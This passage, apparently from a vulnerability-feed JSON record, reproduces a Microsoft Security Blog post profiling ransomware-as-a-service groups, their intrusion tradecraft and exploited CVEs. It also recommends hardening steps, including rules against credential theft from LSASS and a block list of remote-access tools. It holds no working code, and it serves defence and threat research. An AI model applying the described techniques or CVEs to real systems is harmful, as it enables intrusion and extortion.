and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.\n\nIn 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made for an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.\n\nELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called \u201cCombi Security\u201d and \u201cBastion Security\u201d to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.\n\nIn 2020 ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and Revil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware. The tendency to report on ransomware incidents based on payload and attribute it to a monolithic gang often obfuscates the true relationship between the attackers, which is very accurate of the DarkSide RaaS. Case in point, one of the most infamous DarkSide deployments wasn\u2019t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.\n\nELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.\n\nWhile they aren\u2019t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. ELBRUS has also been abusing CVE-2021-31207 in Exchange to compromise organizations in April of 2022, an interesting pivot to using a less popular authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low privileged user credentials into highly privileged access as SYSTEM on an Exchange Server. \n\n### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n\nAn excellent example of how clustering activity based on ransomware payload alone can lead to obfuscating the threat actors behind the attack is DEV-0504. DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the \u201cREvil gang\u201d or \u201cBlackCat ransomware group\u201d. This attribution masks the actions of the set of the attackers in the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment. \n\nFigure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022\n\nDEV-0504 shifts payloads when a RaaS program shuts down, for example the deprecation of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren\u2019t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older \u201cfully owned\u201d ransomware payloads like Phobos, which they can buy when a RaaS isn\u2019t available, or they don\u2019t want to pay the fees associated with RaaS programs.\n\nDEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren\u2019t protected with tamper protection.\n\nDEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022. Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.\n\n### DEV-0237: Prolific collaborator\n\nLike DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.\n\nAfter the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn\u2019t want Hive\u2019s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.\n\n_Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022_\n\nBeyond RaaS payloads, DEV-0237 uses the cybercriminal gig economy to also gain initial access to networks. DEV-0237\u2019s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups versus performing their own initial compromise and malware development.\n\nFigure 5. Examples of DEV-0237\u2019s relationships with other cybercriminal activity groups\n\nLike all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSadmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March of 2022, DEV-0237 was observed to be using a new version of Hive again.\n\n### DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n\nMalvertising, which refers to taking out a search engine ad to lead to a malware payload, has been used in many campaigns, but the access broker that Microsoft tracks as DEV-0206 uses this as their primary technique to gain access to and profile networks. Targets are lured by an ad purporting to be a browser update, or a software package, to download a ZIP file and double-click it. The ZIP package contains a JavaScript file (.js), which in most environments runs when double-clicked. Organizations that have changed the settings such that script files open with a text editor by default instead of a script handler are largely immune from this threat, even if a user double clicks the script.\n\nOnce successfully executed, the JavaScript framework, also referred to [SocGholish](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us>), acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads. These payloads have, in numerous instances, led to custom Cobalt Strike loaders attributed to DEV-0243. DEV-0243 falls under activities tracked by the cyber intelligence industry as \u201cEvilCorp,\u201d The custom Cobalt Strike loaders are similar to those seen in publicly documented [Blister](<https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign>) malware\u2019s inner payloads. In DEV-0243\u2019s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.\n\nAround November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. The use of a RaaS payload by the \u201cEvilCorp\u201d activity group is likely an attempt by DEV-0243 to avoid attribution to their group, which could discourage payment due to their sanctioned status. \n\nFigure 6. The handover from DEV-0206 to DEV-0243\n\n### DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n\nDiffering from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development. Despite this, they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads. Unique among human-operated ransomware threat actors tracked by Microsoft, DEV-0401 [is confirmed to be a China-based activity group.](<https://twitter.com/MsftSecIntel/status/1480730559739359233>)\n\nDEV-0401 differs from many of the attackers who rely on purchasing access to existing malware implants or exposed RDP to enter a network. Instead, the group heavily utilizes unpatched vulnerabilities to access networks, including vulnerabilities in Exchange, Manage Engine AdSelfService Plus, Confluence, and [Log4j 2](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). Due to the nature of the vulnerabilities they preferred, DEV-0401 gains elevated credentials at the initial access stage of their attack.\n\nOnce inside a network, DEV-0401 relies on standard techniques such as using Cobalt Strike and WMI for lateral movement, but they have some unique preferences for implementing these behaviors. Their Cobalt Strike Beacons are frequently launched via DLL search order hijacking. While they use the common Impacket tool for WMI lateral movement, they use a customized version of the _wmiexec.py_ module of the tool that creates renamed output files, most likely to evade static detections. Ransomware deployment is ultimately performed from a batch file in a share and Group Policy, usually written to the NETLOGON share on a Domain Controller, which requires the attackers to have obtained highly privileged credentials like Domain Administrator to perform this action.\n\nFigure 7. Ransomware payloads distributed by DEV-0401 between 2021 and April 2022\n\nBecause DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them. Their payloads are sometimes rebuilt from existing for-purchase ransomware tools like Rook, which shares code similarity with the Babuk ransomware family. In February of 2022, DEV-0401 was observed deploying the Pandora ransomware family, primarily via unpatched VMware Horizon systems vulnerable to the [Log4j 2 CVE-2021-44228 vulnerability](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).\n\nLike many RaaS operators, DEV-0401 maintained a leak site to post exfiltrated data and motivate victims to pay, however their frequent rebranding caused these systems to sometimes be unready for their victims, with their leak site sometimes leading to default web server landing pages when victims attempt to pay. In a notable shift\u2014possibly related to victim payment issues\u2014DEV-0401 started deploying LockBit 2.0 ransomware payloads in April 2022.\n\n### DEV-0537: From extortion to destruction\n\nAn example of a threat actor who has moved to a pure extortion and destruction model without deploying ransomware payloads is an activity group that Microsoft tracks as DEV-0537, also known as LAPSUS$. Microsoft has detailed DEV-0537 actions taken in early 2022 [in this blog](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>). DEV-0537 started targeting organizations mainly in Latin America but expanded to global targeting, including government entities, technology, telecom, retailers, and healthcare. Unlike more opportunistic attackers, DEV-0537 targets specific companies with an intent. Their initial access techniques include exploiting unpatched vulnerabilities in internet-facing systems, searching public code repositories for credentials, and taking advantage of weak passwords. In addition, there is evidence that DEV-0537 leverages credentials stolen by the Redline password stealer, a piece of malware available for purchase in the cybercriminal economy. The group also buys credentials from underground forums which were gathered by other password-stealing malware.\n\nOnce initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. While DEV-0537 doesn\u2019t possess any unique technical capabilities, the group is especially cloud-aware. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. As part of their goals to force payment of ransom, DEV-0537 attempts to delete all server infrastructure and data to cause business disruption. To further facilitate the achievement of their goals, they remove legitimate admins and delete cloud resources and server infrastructure, resulting in destructive attacks. \n\nDEV-0537 also takes advantage of cloud admin privileges to monitor email, chats, and VOIP communications to track incident response efforts to their intrusions. DEV-0537 has been observed on multiple occasions to join incident response calls, not just observing the response to inform their attack but unmuting to demand ransom and sharing their screens while they delete their victim\u2019s data and resources.\n\n## Defending against ransomware: Moving beyond protection by detection\n\nA durable security strategy against determined human adversaries must include the goal of mitigating classes of attacks and detecting them. Ransomware attacks generate multiple, disparate security product alerts, but they could easily get lost or not responded to in time. Alert fatigue is real, and SOCs can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks. \n\nAttackers tweak their techniques and have tools to evade and disable security products. They are also well-versed in system administration and try to blend in as much as possible. However, while attacks have continued steadily and with increased impact, the attack techniques attackers use haven\u2019t changed much over the years. Therefore, a renewed focus on prevention is needed to curb the tide.\n\nRansomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy.\n\n### Building credential hygiene\n\nMore than malware, attackers need credentials to succeed in their attacks. In almost all attacks where ransomware deployment was successful, the attackers had access to a domain admin-level account or local administrator passwords that were consistent throughout the environment. Deployment then can be done through Group Policy or tools like PsExec (or clones like PAExec, CSExec, and WinExeSvc). Without the credentials to provide administrative access in a network, spreading ransomware to multiple systems is a bigger challenge for attackers. Compromised credentials are so important to these attacks that when cybercriminals sell ill-gotten access to a network, in many instances, the price includes a guaranteed administrator account to start with.\n\nCredential theft is a common attack pattern. Many administrators know tools like Mimikatz and LaZagne, and their capabilities to steal passwords from interactive logons in the LSASS process. Detections exist for these tools accessing the LSASS process in most security products. However, the risk of credential exposure isn\u2019t just limited to a domain administrator logging in interactively to a workstation. Because attackers have accessed and explored many networks during their attacks, they have a deep knowledge of common network configurations and use it to their advantage. One common misconfiguration they exploit is running services and scheduled tasks as highly privileged service accounts.\n\nToo often, a legacy configuration ensures that a mission-critical application works by giving the utmost permissions possible. Many organizations struggle to fix this issue even if they know about it, because they fear they might break applications. This configuration is especially dangerous as it leaves highly privileged credentials exposed in the LSA Secrets portion of the registry, which users with administrative access can access. In organizations where the local administrator rights haven\u2019t been removed from end users, attackers can be one hop away from domain admin just from an initial attack like a banking trojan. Building credential hygiene is developing a logical segmentation of the network, based on privileges, that can be implemented alongside network segmentation to limit lateral movement.\n\n**Here are some steps organizations can take to build credential hygiene:**\n\n * Aim to run services as Local System when administrative privileges are needed, as this allows applications to have high privileges locally but can\u2019t be used to move laterally. Run services as Network Service when accessing other resources.\n * Use tools like [LUA Buglight](<https://techcommunity.microsoft.com/t5/windows-blog-archive/lua-buglight-2-3-with-support-for-windows-8-1-and-windows-10/ba-p/701459>) to determine the privileges that applications really need.\n * Look for events with EventID 4624 where [the logon type](<https://twitter.com/jepayneMSFT/status/1012815189345857536>) is 2, 4, 5, or 10 _and_ the account is highly privileged like a domain admin. This helps admins understand which credentials are vulnerable to theft via LSASS or LSA Secrets. Ideally, any highly privileged account like a Domain Admin shouldn\u2019t be exposed on member servers or workstations.\n * Monitor for EventID 4625 (Logon Failed events) in Windows Event Forwarding when removing accounts from privileged groups. Adding them to the local administrator group on a limited set of machines to keep an application running still reduces the scope of an attack as against running them as Domain Admin.\n * Randomize Local Administrator passwords with a tool like [Local Administrator Password S](<https://aka.ms/laps>)olution (LAPS) to prevent lateral movement using local accounts with shared passwords.\n * Use a [cloud-based identity security solution](<https://docs.microsoft.com/defender-for-identity/what-is>) that leverages on-premises Active Directory signals get visibility into identity configurations and to identify and detect threats or compromised identities\n\n### Auditing credential exposure\n\nAuditing credential exposure is critical in preventing ransomware attacks and cybercrime in general. [BloodHound](<https://github.com/BloodHoundAD/BloodHound>) is a tool that was originally designed to provide network defenders with insight into the number of administrators in their environment. It can also be a powerful tool in reducing privileges tied to administrative account and understanding your credential exposure. IT security teams and SOCs can work together with the authorized use of this tool to enable the reduction of exposed credentials. Any teams deploying BloodHound should monitor it carefully for malicious use. They can also use [this detection guidance](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726>) to watch for malicious use.\n\nMicrosoft has observed ransomware attackers also using BloodHound in attacks. When used maliciously, BloodHound allows attackers to see the path of least resistance from the systems they have access, to highly privileged accounts like domain admin accounts and global administrator accounts in Azure.\n\n### Prioritizing deployment of Active Directory updates\n\nSecurity patches for Active Directory should be applied as soon as possible after they are released. Microsoft has witnessed ransomware attackers adopting authentication vulnerabilities within one hour of being made public and as soon as those vulnerabilities are included in tools like Mimikatz. Ransomware activity groups also rapidly adopt vulnerabilities related to authentication, such as ZeroLogon and PetitPotam, especially when they are included in toolkits like Mimikatz. When unpatched, these vulnerabilities could allow attackers to rapidly escalate from an entrance vector like email to Domain Admin level privileges.\n\n### Cloud hardening\n\nAs attackers move towards cloud resources, it\u2019s important to secure cloud resources and identities as well as on-premises accounts. Here are ways organizations can harden cloud environments:\n\n**Cloud identity hardening**\n\n * Implement the [Azure Security Benchmark](<https://docs.microsoft.com/security/benchmark/azure/>) and general [best practices for securing identity infrastructure](<https://docs.microsoft.com/azure/security/fundamentals/identity-management-best-practices>), including:\n * Prevent on-premises service accounts from having direct rights to the cloud resources to prevent lateral movement to the cloud.\n * Ensure that \u201cbreak glass\u201d account passwords are stored offline and configure honey-token activity for account usage.\n * Implement [Conditional Access policies](<https://docs.microsoft.com/azure/active-directory/conditional-access/plan-conditional-access>) enforcing [Microsoft\u2019s Zero Trust principles](<https://www.microsoft.com/security/business/zero-trust>).\n * Enable [risk-based user sign-in protection](<https://docs.microsoft.com/azure/active-directory/authentication/tutorial-risk-based-sspr-mfa>) and automate threat response to block high-risk sign-ins from all locations and enable MFA for medium-risk ones.\n * Ensure that VPN access is protected via [modern authentication methods](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#step-1-enable-modern-authentication-in-your-directory>).\n\n**Multifactor authentication (MFA)**\n\n * Enforce MFA on all accounts, remove users excluded from MFA, and strictly r[equire MFA](<https://docs.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy>) from all devices, in all locations, at all times.\n * Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for the different authentication methods and features.\n * [Identify and secure workload identities](<https://docs.microsoft.com/azure/active-directory/identity-protection/concept-workload-identity-risk>) to secure accounts where traditional MFA enforcement does not apply.\n * Ensure that users are properly educated on not accepting unexpected two-factor authentication (2FA).\n * For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, as many intrusions where MFA was enabled (including those by DEV-0537) still succeeded due to users clicking \u201cYes\u201d on the prompt on their phones even when they were not at their [computers](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match>). Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for an example.\n * Disable [legacy authentication](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#moving-away-from-legacy-authentication>).\n\n**Cloud admins**\n\n * Ensure cloud admins/tenant admins are treated with [the same level of security and credential hygiene](<https://docs.microsoft.com/azure/active-directory/roles/best-practices>) as Domain Admins.\n * Address [gaps in authentication coverage](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-authentication-find-coverage-gaps>).\n\n### Addressing security blind spots\n\nIn almost every observed ransomware incident, at least one system involved in the attack had a misconfigured security product that allowed the attacker to disable protections or evade detection. In many instances, the initial access for access brokers is a legacy system that isn\u2019t protected by antivirus or EDR solutions. It\u2019s important to understand that the lack security controls on these systems that have access to highly privileged credentials act as blind spots that allow attackers to perform the entire ransomware and exfiltration attack chain from a single system without being detected. In some instances, this is specifically advertised as a feature that access brokers sell.\n\nOrganizations should review and verify that security tools are running in their most secure configuration and perform regular network scans to ensure appropriate security products are monitoring and protecting all systems, including servers. If this isn\u2019t possible, make sure that your legacy systems are either physically isolated through a firewall or logically isolated by ensuring they have no credential overlap with other systems.\n\nFor Microsoft 365 Defender customers, the following checklist eliminates security blind spots:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.\n * Enable [network protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.\n * Use [device discovery](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.\n * [Protect user identities and credentials](<https://docs.microsoft.com/defender-for-identity/what-is>) using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.\n\n### Reducing the attack surface\n\nMicrosoft 365 Defender customers can turn on [attack surface reduction rules](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide>) to prevent common attack techniques used in ransomware attacks. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against attacks. In observed attacks from several ransomware-associated activity groups, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:\n\n * Common entry vectors:\n * [Block all Office applications from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block Office communication application from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-communication-application-from-creating-child-processes>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block Office applications from injecting code into other processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-injecting-code-into-other-processes>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * Ransomware deployment and lateral movement stage (in order of impact based on the stage in attack they prevent):\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)\n * [Block process creations originating from PsExec and WMI commands](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n * [Use advanced protection against ransomware](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#use-advanced-protection-against-ransomware>)\n\nIn addition, Microsoft has changed the [default behavior of Office applications to block macros](<https://docs.microsoft.com/DeployOffice/security/internet-macros-blocked>) in files from the internet, further reduce the attack surface for many human-operated ransomware attacks and other threats.\n\n### Hardening internet-facing assets and understanding your perimeter\n\nOrganizations must identify and secure perimeter systems that attackers might use to access the network. Public scanning interfaces, such as [RiskIQ](<https://www.riskiq.com/what-is-attack-surface-management/>), can be used to augment data. Some systems that should be considered of interest to attackers and therefore need to be hardened include:\n\n * Secure Remote Desktop Protocol (RDP) or Windows Virtual Desktop endpoints with MFA to harden against password spray or brute force attacks.\n * Block Remote IT management tools such as Teamviewer, Splashtop, Remote Manipulator System, Anydesk, Atera Remote Management, and ngrok.io via network blocking such as perimeter firewall rules if not in use in your environment. If these systems are used in your environment, enforce security settings where possible to implement MFA.\n\nRansomware attackers and access brokers also use unpatched vulnerabilities, whether already disclosed or zero-day, especially in the initial access stage. Even older vulnerabilities were implicated in ransomware incidents in 2022 because some systems remained unpatched, partially patched, or because access brokers had established persistence on a previously compromised systems despite it later being patched.\n\nSome observed vulnerabilities used in campaigns between 2020 and 2022 that defenders can check for and mitigate include:\n\n * Citrix ADC systems affected by [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)\n * [Pulse Secure VPN systems](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) affected by [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>), [CVE-2020-8260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8260>), [CVE-2020-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8243>), [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), [CVE-2021-22894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22894>), [CVE-2021-22899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22899>), and [CVE-2021-22900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22900>)\n * SonicWall SSLVPN affected by [CVE-2021-20016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20016>)\n * Microsoft SharePoint servers affected by [CVE-2019-0604](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2019-0604>)\n * Unpatched [Microsoft Exchange servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)\n * Zoho ManageEngine systems affected by [CVE-2020-10189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189>)\n * FortiGate VPN servers affected by [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)\n * Apache log4j [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\nRansomware attackers also rapidly [adopt new vulnerabilities](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). To further reduce organizational exposure, Microsoft Defender for Endpoint customers can use the [threat and vulnerability management](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations.\n\n## Microsoft 365 Defender: Deep cross-domain visibility and unified investigation capabilities to defend against ransomware attacks\n\nThe multi-faceted threat of ransomware requires a comprehensive approach to security. The steps we outlined above defend against common attack patterns and will go a long way in preventing ransomware attacks. [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) is designed to make it easy for organizations to apply many of these security controls.\n\nMicrosoft 365 Defender\u2019s industry-leading visibility and detection capabilities, demonstrated in the recent [MITRE Engenuity ATT&amp;CK\u00ae Evaluations](<https://www.microsoft.com/security/blog/2022/04/05/microsoft-365-defender-demonstrates-industry-leading-protection-in-the-2022-mitre-engenuity-attck-evaluations/>), automatically stop most common threats and attacker techniques. To equip organizations with the tools to combat human-operated ransomware, which by nature takes a unique path for every organization, Microsoft 365 Defender provides rich investigation features that enable defenders to seamlessly inspect and remediate malicious behavior across domains.\n\n[Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)\n\nIn line with the recently announced expansion into a new service category called [**Microsoft Security Experts**](<https://www.microsoft.com/en-us/security/business/services>), we&#x27;re introducing the availability of [Microsoft Defender Experts for Hunting](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/defenderexpertsforhuntingprev>) for public preview. Defender Experts for Hunting is for customers who have a robust security operations center but want Microsoft to help them proactively hunt for threats across Microsoft Defender data, including endpoints, Office 365, cloud applications, and identity.\n\nJoin our research team at the **Microsoft Security Summit** digital event on May 12 to learn what developments Microsoft is seeing in the threat landscape, as well as how we can help your business mitigate these types of attacks. Ask your most pressing questions during the live chat Q&amp;A. [Register today.](<https://mssecuritysummit.eventcore.com?ocid=AID3046765_QSG_584073>)\n\nThe post [Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-09T13:00:00", "type": "mssecure", "title": "Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-20016", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-31207", "CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-05-09T13:00:00", "id": "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "href": "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-11-27T05:17:02", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 